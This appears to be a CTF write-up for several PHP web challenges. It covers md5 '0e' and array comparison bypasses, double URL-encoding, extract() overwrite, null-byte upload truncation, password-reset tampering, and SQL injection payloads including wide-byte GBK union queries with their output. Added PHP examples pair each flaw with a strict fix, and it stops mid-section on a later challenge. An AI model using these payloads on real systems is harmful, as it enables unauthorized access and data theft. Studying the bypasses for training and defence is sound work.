- No obvious way in; let's see what md5('QNKCDZO') looks like:
0e830400451993494058024219903391
- It starts with 0e. Exploit the behaviour of "==": the comparison converts the operands, and a numeric string such as 0eXXXXXXXXXX becomes 0.
- Other strings whose MD5 also starts with 0e:
s878926199a: 0e545993274517709034328855841020
s155964671a: 0e342768416822451524974117254469
s214587387a: 0e848240448830537924465865611904
s1091221200a: 0e940624217856561557816327384675
s1885207154a: 0e509367213418206700842008763514
s1502113478a: 0e861580163291561247404381396064
s1836677006a: 0e481036490867661113260034900752
s1184209335a: 0e072485820392773389523109082030
s1665632922a: 0e731198061491163073197128363787
s532378020a: 0e220463095855511507588041205815
- Pass the parameter a=s878926199a:
http://chinalover.sinaapp.com/web19/?a=s878926199a
nctf{md5_collision_is_easy}
- Check carefully whether it is GET or POST; I kept POSTing at first and got no result no matter what.
- nctf{md5_collision_is_easy}
bypass again
Address: still weak typing
Source: hctf
if (isset($_GET['a']) and isset($_GET['b'])) {
if ($_GET['a'] != $_GET['b'])
if (md5($_GET['a']) == md5($_GET['b']))
die('Flag: '.$flag);
else
print 'Wrong.';
}
Requirements:
1. Pass two parameters a and b
2. a != b
3. md5(a) == md5(b)
- Exploit the loose parameter handling of built-in functions: pass the function an argument type it cannot accept.
Pass two arrays so that md5() returns NULL, and NULL == NULL:
http://chinalover.sinaapp.com/web17/index.php?a[]=1&b[]=2
Flag: nctf{php_is_so_cool}
- Once again I did not check whether it was GET or POST and kept POSTing; I really am something.
- nctf{php_is_so_cool}
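The strcmp, md5 collision, bypass again and MYSQL challenges above all rest on the same loose comparisons. The following is an added example, not code from the writeup: each pitfall beside a strict version (function names and sample inputs are this example's own; the md5 values are the ones the page lists).

```php
<?php
// Added example, not from the writeup: the loose-comparison pitfalls behind
// the strcmp, md5-collision, bypass-again and MYSQL challenges, each beside
// a strict version. Function names and sample inputs are this example's own.

// Pitfall 1: == between two "0e<digits>" strings. Both are numeric strings
// equal to 0, so == reports a match although the hashes differ.
function hashes_match_loose(string $a, string $b): bool {
    return md5($a) == md5($b);
}

// Pitfall 2: a non-string reaches strcmp()/md5(). Up to PHP 7 that gives a
// warning and NULL, so !NULL and NULL == NULL both pass; since PHP 8 it throws
// a TypeError, which @ does not silence, so the request crashes instead.
function password_ok_loose($submitted, string $expected): bool {
    return !@strcmp($submitted, $expected);
}

// Pitfall 3: validating one value and using another. sql.php checks the raw
// id against 1024 but queries with intval($id).
function id_rejected_loose($raw): bool {
    $id = intval($raw);                 // intval("1024.1") === 1024
    return $raw == 1024;               // "1024.1" == 1024 is false, so not rejected
}

// Strict versions: reject non-strings up front, compare with === or
// hash_equals() (type-strict and constant-time), and check the value you use.
function hashes_match_strict($a, $b): bool {
    if (!is_string($a) || !is_string($b)) {
        return false;
    }
    return hash_equals(md5($a), md5($b));
}

function password_ok_strict($submitted, string $expected): bool {
    return is_string($submitted) && hash_equals($expected, $submitted);
}

// Returns the id that will actually be queried, or null for anything that is
// not a plain digit string; the caller applies its checks to this value.
function parse_id_strict($raw): ?int {
    return (is_string($raw) && ctype_digit($raw)) ? (int)$raw : null;
}

// Constructed inputs.
var_dump(hashes_match_loose('QNKCDZO', 's878926199a'));   // bool(true)
var_dump(hashes_match_strict('QNKCDZO', 's878926199a'));  // bool(false)
var_dump('0e830400451993494058024219903391' == '0');       // bool(true)
var_dump('0000000000' == '0');                              // bool(true): leading zeros compare numerically too

var_dump(password_ok_strict(['123'], 'secret'));           // bool(false)
var_dump(password_ok_strict('secret', 'secret'));          // bool(true)
// password_ok_loose(['123'], 'secret') is bool(true) up to PHP 7.4 and a TypeError on PHP 8.

var_dump(id_rejected_loose('1024.1'));                     // bool(false) although the query runs with 1024
var_dump(parse_id_strict('1024.1'));                       // NULL: rejected before any query
var_dump(parse_id_strict('1024'));                         // int(1024): now the 1024 check is meaningful
```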
PHP is the best language in the world
I hear PHP is the best language in the world
Address: challenge address
- Open index.txt:
http://way.nuptzj.cn/php/index.txt
<?php
if(eregi("hackerDJ",$_GET[id])) {
echo("<p>not allowed!</p>");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
echo "<p>Access granted!</p>";
echo "<p>flag: *****************} </p>";
}
?>
<br><br>
Can you authenticate to this website?
- I first fiddled with the eregi() function: a case-insensitive string match.
- Then I noticed that the source urldecodes id a second time, so we need to urlencode id twice:
1. URL encoding normally does not convert letters,
2. so first convert hackerDJ to hex and put a percent sign before each pair of digits: %63%6b%65%72%44%4a
3. then urlencode again: %2563%256b%2565%2572%2544%254a
http://way.nuptzj.cn/php/index.php/?id=%2563%256b%2565%2572%2544%254a
Access granted!
flag: nctf{php_is_best_language}
Can you authenticate to this website? index.txt
- Postscript:
URL decoding:
%-->%
%25-->%
The second urlencode really only turns % into %25, so double-encoding a single character is enough: %2563%6b%65%72%44%4a; the other % signs still decode to %.
- nctf{php_is_best_language}
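The order of operations in index.txt, filter first and decode afterwards, is the whole bug. Added example, not the challenge's code: the vulnerable order beside the corrected one, with the inputs written as $_GET holds them after PHP's own single decode (names are this example's own).

```php
<?php
// Added example, not the challenge's code: why filtering before a second
// urldecode() is bypassable, and the corrected order. Names are this example's own.

// PHP has already percent-decoded $_GET once. The challenge filters that
// once-decoded value, then decodes it again before comparing, so an id sent
// as %2568%2561... arrives as %68%61..., passes the filter, and decodes to
// hackerDJ at the comparison.
function vulnerable_check(string $id): string {
    if (stripos($id, 'hackerDJ') !== false) {   // filter runs on the not-yet-decoded value
        return 'not allowed';
    }
    $id = urldecode($id);                       // second decode happens after the filter
    return $id === 'hackerDJ' ? 'granted' : 'denied';
}

// Fixed: normalise first (decode exactly as often as the application means
// to), then run every check on the same final value. A check that does not
// see the value actually used can always be dodged by encoding.
function fixed_check(string $id): string {
    $final = urldecode($id);
    if (stripos($final, 'hackerDJ') !== false) {
        return 'not allowed';
    }
    return $final === 'hackerDJ' ? 'granted' : 'denied';
}

// Constructed inputs, as the server sees them after PHP's own decoding.
$plain   = 'hackerDJ';
$double  = '%68%61%63%6b%65%72%44%4a';   // every byte of hackerDJ still percent-encoded
$partial = '%68ackerDJ';                  // one double-encoded character is enough

var_dump(vulnerable_check($plain));    // string(11) "not allowed"
var_dump(vulnerable_check($double));   // string(7) "granted"   -> bypass
var_dump(vulnerable_check($partial));  // string(7) "granted"   -> bypass
var_dump(fixed_check($double));        // string(11) "not allowed"
var_dump(fixed_check($partial));       // string(11) "not allowed"
```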
SQL injection 1
I hear you can do injection too?
Address: challenge address
- Click source:
<html>
<head>
Secure Web Login
</head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
mysql_select_db(SAE_MYSQL_DB);
$user = trim($_POST[user]);
$pass = md5(trim($_POST[pass]));
$sql="select user from ctf where (user='".$user."') and (pw='".$pass."')";
echo '</br>'.$sql;
$query = mysql_fetch_array(mysql_query($sql));
if($query[user]=="admin") {
echo "<p>Logged in! flag:******************** </p>";
}
if($query[user] != "admin") {
echo("<p>You are not admin!</p>");
}
}
echo $query[user];
?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>
- In PHP the dot is the concatenation operator:
SQLstr = "select * from abc_table where user_name = ' " . $user_name . " ' ";
can be rewritten as
SQLstr = "select * from abc_table where user_name = ' $user_name ' ";
- There is no filtering, so the injection only needs to close the ') and set user=admin.
- nctf{ni_ye_hui_sql?}
/x00
Challenge address: this challenge has several solutions; how many can you think of?
- The page gives the source:
view-source:
if (isset ($_GET['nctf'])) {
if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE)
echo '必須輸入數(shù)字才行';
else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE)
die('Flag: '.$flag);
else
echo '騷年,繼續(xù)努力吧啊~';
}
- Requirements:
1. Pass the nctf parameter
2. nctf must start with a digit, contain digits, and end with a digit: ^[1-9]+$ means all digits
3. nctf must contain #biubiubiu for the flag to be printed
- Use a 0x00 byte to truncate ereg()
- Remember to urlencode:
0x00-->%00
#-->%23
Set nctf=123%00%23biubiubiu
- Refresh and the flag appears:
Flag: flag:nctf{use_00_to_jieduan}
- nctf{use_00_to_jieduan}
- Postscript:
Setting nctf[]=123 gives:
Warning: strpos() expects parameter 1 to be string, array given in web4/f5a14f5e6e3453b78cd73899bad98d53/index.php on line 10
Flag: flag:nctf{use_00_to_jieduan}
- Explanation:
--> ereg() works on strings; given an array it returns NULL
--> NULL === FALSE is false (strict comparison)
--> strpos() works on strings; given an array it returns NULL
--> NULL === FALSE does not hold, so NULL !== FALSE and the flag is printed
Reference:
Variable overwrite
Heard of variable overwriting?
Address: challenge address
- View source.php:
<?php
include("secret.php");
?>
<html>
<head>
<title>The Ducks</title>
<link rel="stylesheet" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
</head>
<body>
<div class="container">
<div class="jumbotron">
<center>
<h1>The Ducks</h1>
<?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
<?php
extract($_POST);
if ($pass == $thepassword_123) { ?>
<div class="alert alert-success">
<code><?php echo $theflag; ?></code>
</div>
<?php } ?>
<?php } ?>
<form action="." method="POST">
<div class="row">
<div class="col-md-6 col-md-offset-3">
<div class="row">
<div class="col-md-9">
<input type="password" class="form-control" name="pass" placeholder="Password" />
</div>
<div class="col-md-3">
<input type="submit" class="btn btn-primary" value="Submit" />
</div>
</div>
</div>
</div>
</form>
</center>
</div>
<p>
<center>
source at <a href="source.php" target="_blank">/source.php</a>
</center>
</p>
</div>
</body>
</html>
- Key part:
<?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
<?php
extract($_POST);
if ($pass == $thepassword_123) { ?>
<div class="alert alert-success">
<code><?php echo $theflag; ?>
- extract() imports variables from an array into the current symbol table.
1. It uses the array keys as variable names and the array values as variable values; for each element it creates a variable in the current symbol table.
2. Since extract() is given $_POST, POST a parameter thepassword_123 to overwrite the default thepassword_123 and set the POSTed pass equal to thepassword_123.
- nctf{bian_liang_fu_gai!}
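Added example, not the challenge's code: the extract($_POST) overwrite simulated with constructed request bodies, beside the two ways the same check can be written safely (function names are this example's own).

```php
<?php
// Added example, not the challenge's code: how extract($_POST) lets the
// client overwrite a server-side variable, beside two safe ways to write
// the same check. The arrays below are constructed stand-ins for $_POST.

function check_vulnerable(array $post): bool {
    $thepassword_123 = 'server-secret';   // stands in for secret.php
    extract($post);                        // default EXTR_OVERWRITE: request keys replace existing variables
    return $pass == $thepassword_123;
}

// Fix 1: never turn request keys into variables; read the one key you need.
function check_explicit(array $post): bool {
    $thepassword_123 = 'server-secret';
    $pass = $post['pass'] ?? null;
    return is_string($pass) && hash_equals($thepassword_123, $pass);
}

// Fix 2: if extract() has to stay, EXTR_SKIP leaves variables that already
// exist alone, so the secret cannot be replaced from the request.
function check_extract_skip(array $post): bool {
    $thepassword_123 = 'server-secret';
    extract($post, EXTR_SKIP);
    return isset($pass) && is_string($pass) && hash_equals($thepassword_123, $pass);
}

$wrong_guess = ['pass' => 'guess'];
$right_guess = ['pass' => 'server-secret'];
$overwrite   = ['pass' => 'x', 'thepassword_123' => 'x'];   // the page's trick

var_dump(check_vulnerable($wrong_guess));     // bool(false)
var_dump(check_vulnerable($overwrite));       // bool(true): the client chose both sides of the comparison
var_dump(check_explicit($overwrite));         // bool(false)
var_dump(check_extract_skip($overwrite));     // bool(false)
var_dump(check_extract_skip($right_guess));   // bool(true): the real password still works
```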
Upload bypass
Challenge address: guess how the code is written
- A file-upload type bypass. Open Burp Suite and try uploading a file:
1. filename=1.png
2. uppath=/uploads/1.png
- Now upload a php:
1. filename=download.php
2. uppath=/uploads/download.php
- Analysis:
1. The uploaded file extension has to be php and at the same time jpg, png or gif.
2. The code matches two places:
1. filename
2. the upload path: /uploads/
- Let's see how path is formed; change path and filename and look:
1. filename=download.jpg
2. uppath=/uploads/dowload.phpdownload.jpg
3. upfilename=path & filename
- Use 0x00 truncation (for truncation in uploads see this article) to cut off the download.jpg after download.php:
uppath=/uploads/download.phpchr(0)download.jpg
- nctf{welcome_to_hacks_world}
Naming things is hard
Address: the code is as follows
<?php
function noother_says_correct($number)
{
$one = ord('1');
$nine = ord('9');
for ($i = 0; $i < strlen($number); $i++)
{
$digit = ord($number{$i});
if ( ($digit >= $one) && ($digit <= $nine) )
{
return false;
}
}
return $number == '54975581388';
}
$flag='*******';
if(noother_says_correct($_GET['key']))
echo $flag;
else
echo 'access denied';
?>
- Analysis:
1. noother_says_correct($_GET['key']) must be true,
2. so $number == '54975581388' must hold and return true,
3. but the preceding code checks that $number contains no digit 1-9.
- Exploit the == behaviour:
- 54975581388 in hexadecimal is ccccccccc
http://chinalover.sinaapp.com/web12/index.php?key=0xccccccccc
The flag is:nctf{follow_your_dream}
- nctf{follow_your_dream}
sql injection 3
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
- Wide-byte injection
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1'
your sql:select id,title from news where id = '1\''
Hello World!OVO
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df'
your sql:select id,title from news where id = '1運''
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in SQL-GBK/index.php on line 10
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=1 -- -
your sql:select id,title from news where id = '1運' and 1=1 -- -'
Hello World!OVO
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 -- -
your sql:select id,title from news where id = '1運' and 1=2 -- -'
- Good, it is injectable.
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' order by 2 -- -
your sql:select id,title from news where id = '1運' order by 2 -- -'
Hello World!OVO
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,2 -- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,2 -- -'
2
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,concat_ws(0x7c,user(),database(),version()) -- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,concat_ws(0x7c,user(),database(),version()) -- -'
sae-chinalover@220.181.129.119|sae-chinalover|5.5.52-0ubuntu0.14.04.1
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sae-chinalover'-- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=\'sae-chinalover\'-- -'
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in SQL-GBK/index.php on line 10
The single quotes were escaped.
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572-- -
sae-chinalover in hex is 0x7361652d6368696e616c6f766572; use hex to get around the character escaping.
your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572-- -'
ctf,ctf2,ctf3,ctf4,news
- Find the flag in ctf2:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746632 and table_schema=0x7361652d6368696e616c6f766572-- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746632 and table_schema=0x7361652d6368696e616c6f766572-- -'
id,content
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df' and 1=2 union select 1,group_concat(id,content) from ctf2-- -
your sql:select id,title from news where id = '1運' and 1=2 union select 1,group_concat(id,content) from ctf2-- -'
1020no msg in 1020,1021no msg in 1021 too,1022no msg in 1022,1023no msg in 1023~~~,1024the flag is:nctf{query_in_mysql},1025no more
- nctf{query_in_mysql}
- This challenge seems to be broken; other writeups use a different link, but the point is still wide-byte injection, nctf{gbk_3sqli}.
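The '1運'' in the echoed SQL above is the whole mechanism: the escaper adds a backslash byte by byte, but the GBK connection reads DF 5C as one character. Added example, not the challenge's code, showing that at the byte level and the two fixes (function names and connection details are this example's own placeholders).

```php
<?php
// Added example, not the challenge's code: why a charset-unaware escaper in
// front of a GBK connection lets %df' break out of the quotes, and the two
// fixes. Connection details in the fix functions are placeholders.

// The bytes the server holds for id=1%df' after addslashes()-style escaping.
$input   = "1\xdf'";
$escaped = addslashes($input);              // 31 DF 5C 27

// Byte by byte there are four characters: 1, DF, \ and '.
// Read as GBK, DF 5C is a single two-byte character (運), so the quote is
// no longer escaped and the SQL becomes id = '1運'' exactly as the page shows.
function gbk_chars(string $s): array {
    return mb_str_split($s, 1, 'GBK');
}

function quote_escaped_for_gbk(string $escaped): bool {
    // True only if the final quote is still preceded by a lone backslash character.
    $chars = gbk_chars($escaped);
    $n = count($chars);
    return $n >= 2 && $chars[$n - 1] === "'" && $chars[$n - 2] === '\\';
}

echo bin2hex($escaped), "\n";                 // 31df5c27
var_dump(strlen($escaped));                   // int(4)
var_dump(count(gbk_chars($escaped)));         // int(3): 1, 運, '
var_dump(quote_escaped_for_gbk($escaped));    // bool(false) -> injectable

// Fix 1: tell the client library the real connection charset, so that
// mysqli_real_escape_string() knows DF 5C is one character. Sending
// "SET NAMES gbk" as a query changes the server side only and does not
// inform the client library.
function escape_for_gbk_connection(mysqli $conn, string $value): string {
    mysqli_set_charset($conn, 'gbk');
    return mysqli_real_escape_string($conn, $value);
}

// Fix 2 (preferred): a prepared statement; the value never becomes SQL text.
function fetch_news(mysqli $conn, string $id): ?array {
    $stmt = mysqli_prepare($conn, 'SELECT id, title FROM news WHERE id = ?');
    mysqli_stmt_bind_param($stmt, 's', $id);
    mysqli_stmt_execute($stmt);
    return mysqli_stmt_get_result($stmt)->fetch_assoc() ?: null;
}
```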
Password reset
Reset the password of the administrator account admin
After clicking forgot password, your mailbox receives a reset email like this:
Click this link to reset your password
- http://nctf.nuptzj.cn/web13/index.php?user1=Y3RmdXNlcg==
Y3RmdXNlcg== is the base64 of ctfuser.
- Change user=admin and the url's user1=base64(admin).
- nctf{reset_password_often_have_vuln}
sql injection 4
Keep injecting~
Challenge address
TIP: the backslash can be used to escape
Look carefully at how the relevant functions work
- View the source:
<!--
#GOAL: login as admin,then get the flag;
error_reporting(0);
require 'db.inc.php';
function clean($str){
if(get_magic_quotes_gpc()){
$str=stripslashes($str);
}
return htmlentities($str, ENT_QUOTES);
}
$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);
$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
die('Invalid password!');
}
echo $flag;
-->
Invalid password!
- SQL statement:
SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';
is equivalent to:
SELECT * FROM users WHERE name=' $username' AND pass='$password';
- Single-quoted SQL:
1. Adding a single quote to close the first one does not work, because clean() escapes it earlier:
http://chinalover.sinaapp.com/web15/index.php?username=admin' or 1=1 1-- - &password=123
2. Use \ to escape away the quote that closes name:
http://chinalover.sinaapp.com/web15/index.php?username=admin&password= or 1=1 -- -
The SQL becomes:
SELECT * FROM users WHERE name=' admin\' AND pass= ' or 1=1 -- -';
- Refresh and the flag appears:
flag:nctf{sql_injection_is_interesting}
- nctf{sql_injection_is_interesting}
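clean() neutralises quotes but not the backslash, so the closing quote of name is swallowed and the password field turns into SQL. Added example, not the challenge's code: a small tokenizer that reads the built query the way MySQL does (backslash escapes, '' quotes, "-- " comments), so the change of structure is visible without a database, followed by the prepared-statement fix (names are this example's own).

```php
<?php
// Added example, not the challenge's code: the page's clean() only encodes
// quotes, so a username ending in a backslash eats the closing quote and the
// password field becomes SQL. The tokenizer follows MySQL's quoting rules so
// the structural change is visible without a database.

function clean(string $str): string {
    return htmlentities($str, ENT_QUOTES);     // ' becomes &#039; but \ is left alone
}

function build_query(string $username, string $password): string {
    return "SELECT * FROM users WHERE name='" . clean($username)
         . "' AND pass='" . clean($password) . "';";
}

// Splits SQL text into string literals and bare SQL the way MySQL reads it:
// \x escapes the next character inside a literal, '' is an embedded quote,
// and "-- " starts a comment that runs to the end of the statement.
function mysql_tokens(string $sql): array {
    $tokens = [];
    $bare = '';
    $len = strlen($sql);
    for ($i = 0; $i < $len; ) {
        if (substr($sql, $i, 3) === '-- ') {
            break;                                  // the rest is a comment
        }
        if ($sql[$i] !== "'") {
            $bare .= $sql[$i++];
            continue;
        }
        if ($bare !== '') { $tokens[] = ['sql', $bare]; $bare = ''; }
        $lit = '';
        for ($i++; $i < $len; $i++) {
            $c = $sql[$i];
            if ($c === '\\' && $i + 1 < $len) { $lit .= $sql[++$i]; continue; }
            if ($c === "'") {
                if ($i + 1 < $len && $sql[$i + 1] === "'") { $lit .= "'"; $i++; continue; }
                $i++;
                break;
            }
            $lit .= $c;
        }
        $tokens[] = ['literal', $lit];
    }
    if ($bare !== '') { $tokens[] = ['sql', $bare]; }
    return $tokens;
}

// Constructed inputs: a normal login, then the backslash payload from the page.
foreach (mysql_tokens(build_query('admin', 'wrong')) as [$kind, $text]) {
    echo str_pad($kind, 8), ": ", $text, "\n";
}
// sql     : SELECT * FROM users WHERE name=
// literal : admin
// sql     :  AND pass=
// literal : wrong
// sql     : ;
echo "---\n";
foreach (mysql_tokens(build_query('admin\\', ' or 1=1 -- -')) as [$kind, $text]) {
    echo str_pad($kind, 8), ": ", $text, "\n";
}
// sql     : SELECT * FROM users WHERE name=
// literal : admin' AND pass=
// sql     :  or 1=1           <- bare SQL now; the real closing quote is commented out

// Fix: a prepared statement. The values never enter the SQL text, so neither
// a backslash nor a quote can change its structure.
function lookup_user(PDO $db, string $username, string $password) {
    $stmt = $db->prepare('SELECT * FROM users WHERE name = ? AND pass = ?');
    $stmt->execute([$username, $password]);
    return $stmt->fetch();
}
```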
Where are you from
Are you from Google?
Link: challenge address
- In principle setting Referer to "https://www.google.com/" should do it, but the site seems to be broken; the source confirms that is the approach.
<?php
$referer = $_SERVER['referer'];
if ($referer === "https://www.google.com/ " || $referer === "https://www.google.com"){
echo "nctf{http_referer}";
}else{
echo "are you from google?";
}
?>
AAencode
javascript aaencode
Link: challenge address
Opening the link shows mojibake like this; I don't know why, it shouldn't be like that.
- Looking at the source, it really should not be like that; this AAencode can be run directly in the browser console.
?ω??= /`m′)? ~┻━┻ //*′?`*/ ['_']; o=(???) =_=3; c=(?Θ?) =(???)-(???); (?Д?) =(?Θ?)= (o^_^o)/ (o^_^o);(?Д?)={?Θ?: '_' ,?ω?? : ((?ω??==3) +'_') [?Θ?] ,???? :(?ω??+ '_')[o^_^o -(?Θ?)] ,?Д??:((???==3) +'_')[???] }; (?Д?) [?Θ?] =((?ω??==3) +'_') [c^_^o];(?Д?) ['c'] = ((?Д?)+'_') [ (???)+(???)-(?Θ?) ];(?Д?) ['o'] = ((?Д?)+'_') [?Θ?];(?o?)=(?Д?) ['c']+(?Д?) ['o']+(?ω?? +'_')[?Θ?]+ ((?ω??==3) +'_') [???] + ((?Д?) +'_') [(???)+(???)]+ ((???==3) +'_') [?Θ?]+((???==3) +'_') [(???) - (?Θ?)]+(?Д?) ['c']+((?Д?)+'_') [(???)+(???)]+ (?Д?) ['o']+((???==3) +'_') [?Θ?];(?Д?) ['_'] =(o^_^o) [?o?] [?o?];(?ε?)=((???==3) +'_') [?Θ?]+ (?Д?) .?Д??+((?Д?)+'_') [(???) + (???)]+((???==3) +'_') [o^_^o -?Θ?]+((???==3) +'_') [?Θ?]+ (?ω?? +'_') [?Θ?]; (???)+=(?Θ?); (?Д?)[?ε?]='\\'; (?Д?).?Θ??=(?Д?+ ???)[o^_^o -(?Θ?)];(o???o)=(?ω?? +'_')[c^_^o];(?Д?) [?o?]='\"';(?Д?) ['_'] ( (?Д?) ['_'] (?ε?+(?Д?)[?o?]+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+((???) + (?Θ?))+ (c^_^o)+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((o^_^o) +(o^_^o))+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (o^_^o)+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (?Θ?)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) 
+ (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((o^_^o) +(o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (o^_^o)+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (?Θ?))+ ((???) + (o^_^o))+ (?Д?)[?ε?]+(?Θ?)+ (???)+ (???)+ (?Д?)[?ε?]+(?Θ?)+ (???)+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(?Θ?)+ ((???) + (o^_^o))+ ((???) + (?Θ?))+ (?Д?)[?ε?]+(???)+ ((o^_^o) - (?Θ?))+ (?Д?)[?ε?]+((???) + (?Θ?))+ (?Θ?)+ (?Д?)[?o?]) (?Θ?)) ('_');
nctf{javascript_aaencode}
PHP deserialization
http://115.28.150.176/php1/index.php
Code:
<?php
class just4fun {
var $enter;
var $secret;
}
if (isset($_GET['pass'])) {
$pass = $_GET['pass'];
if(get_magic_quotes_gpc()){
$pass=stripslashes($pass);
}
$o = unserialize($pass);
if ($o) {
$o->secret = "*";
if ($o->secret === $o->enter)
echo "Congratulation! Here is my secret: ".$o->secret;
else
echo "Oh no... You can't fool me";
}
else echo "are you trolling?";
}
?>
- I can't do this one, haha, too much of a noob.
SQL injection 2
Second injection challenge~~ mainly about union queries
Link: click me
- Source:
<html>
<head>
Secure Web Login II
</head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
mysql_select_db(SAE_MYSQL_DB);
$user = $_POST[user];
$pass = md5($_POST[pass]);
$query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
echo "<p>Logged in! Key: ntcf{**************} </p>";
}
else {
echo("<p>Log in failure!</p>");
}
}
?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>
- Key statements:
1. $pass = md5($_POST[pass]);
2. $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
3. strcasecmp(): returns 0 if the two are equal.
- We can select a password of our own to be returned in $query:
select pw from ctf where user='$user' and 0=1 union select md5(123) -- -
1. and 0=1 makes the preceding select pw from ctf where user='$user' false, so it returns nothing.
2. The whole statement then returns md5(123) into $query.
3. This sidesteps the database lookup; we assign $query ourselves.
- ntcf{union_select_is_wtf}
Comprehensive challenge 2
Not an XSS challenge, but feel free to leave a message~
Address: get the flag
- Click the "About this CMS" link at the bottom:
http://cms.nuptzj.cn/about.php?file=sm.txt
It shows:
Clearly this is a file left over from installation that someone forgot to delete... As for why the link appears on the home page, ask the administrator...
===============================fancy divider=============================
This CMS is a company message-board system developed by Funny Inc. According to our CTO, it was built with world-class technology, and its security and usability are top-notch~
Below is a description of the CMS files (the programmer was lazy and only listed some):
config.php: holds the database information; modify it when migrating this CMS
index.php: the home page
passencode.php: Funny Inc.'s own password encryption algorithm library
say.php: receives and handles user message requests
sm.txt: this CMS's documentation
SAE's information_schema table does not seem to be searchable, so the admin table structure is given here:
